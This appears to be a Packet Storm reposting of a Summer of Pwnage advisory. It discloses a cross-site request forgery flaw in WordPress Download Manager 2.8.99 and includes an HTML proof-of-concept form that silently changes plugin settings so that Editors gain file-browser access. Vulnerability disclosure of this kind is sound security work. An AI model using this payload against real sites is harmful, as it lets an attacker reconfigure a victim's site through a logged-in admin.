exploit the possibilities

WordPress Download Manager 2.8.99 Cross Site Request Forgery

WordPress Download Manager 2.8.99 Cross Site Request Forgery
Posted Mar 3, 2017
Authored by Securify B.V., Burak Kelebek

WordPress Download Manager plugin version 2.8.99 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 20bf543d02c87fe299a9790ac36a738bfe591d5a554f77dc7a8ec09706a75ea8

WordPress Download Manager 2.8.99 Cross Site Request Forgery

Change Mirror Download
------------------------------------------------------------------------
Cross-Site Request Forgery in WordPress Download Manager Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability has been found in the
WordPress Download Manager Plugin. By using this vulnerability an
attacker can change confidential settings of the plugin.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0005

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress Download Manager version
2.8.99.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_download_manager_plugin.html

The Download Manager plugin lacks a CSRF (nonce) token on the request of saving settings. Because of this an attacker is able to change confidential settings like file browser access and browser base dir by luring a logged-in admin to follow a malicious link containing the proof of concept below.
Proof of concept

The proof of concept below gives file browser access to a user with Editor privileges:

<html>
<body>
<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="task" value="wdm_save_settings"/>
<input type="hidden" name="action" value="wdm_settings"/>
<input type="hidden" name="section" value="basic"/>
<input type="hidden" name="wpdm_permission_msg" value="Access Denied"/>
<input type="hidden" name="wpdm_login_msg" value="<a href='http://<target>/wp-login.php'>Please login to download</a>
"/>
<input type="hidden" name="_wpdm_file_browser_root" value="/srv/www/wordpress-default/"/>
<input type="hidden" name="_wpdm_file_browser_access[]" value="editor"/>
<input type="hidden" name="_wpdm_file_browser_access[]" value="administrator"/>
<input type="hidden" name="__wpdm_sanitize_filename" value="0"/>
<input type="hidden" name="__wpdm_download_speed" value="4096"/>
<input type="hidden" name="__wpdm_download_resume" value="1"/>
<input type="hidden" name="__wpdm_support_output_buffer" value="1"/>
<input type="hidden" name="__wpdm_open_in_browser" value="0"/>
<input type="hidden" name="_wpdm_recaptcha_site_key" value=""/>
<input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/>
<input type="hidden" name="__wpdm_disable_scripts[]" value=""/>
<input type="hidden" name="__wpdm_login_url" value=""/>
<input type="hidden" name="__wpdm_register_url" value=""/>
<input type="hidden" name="__wpdm_user_dashboard" value=""/>
<input type="submit"/>
</form>
</body>
</html>


------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.
Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close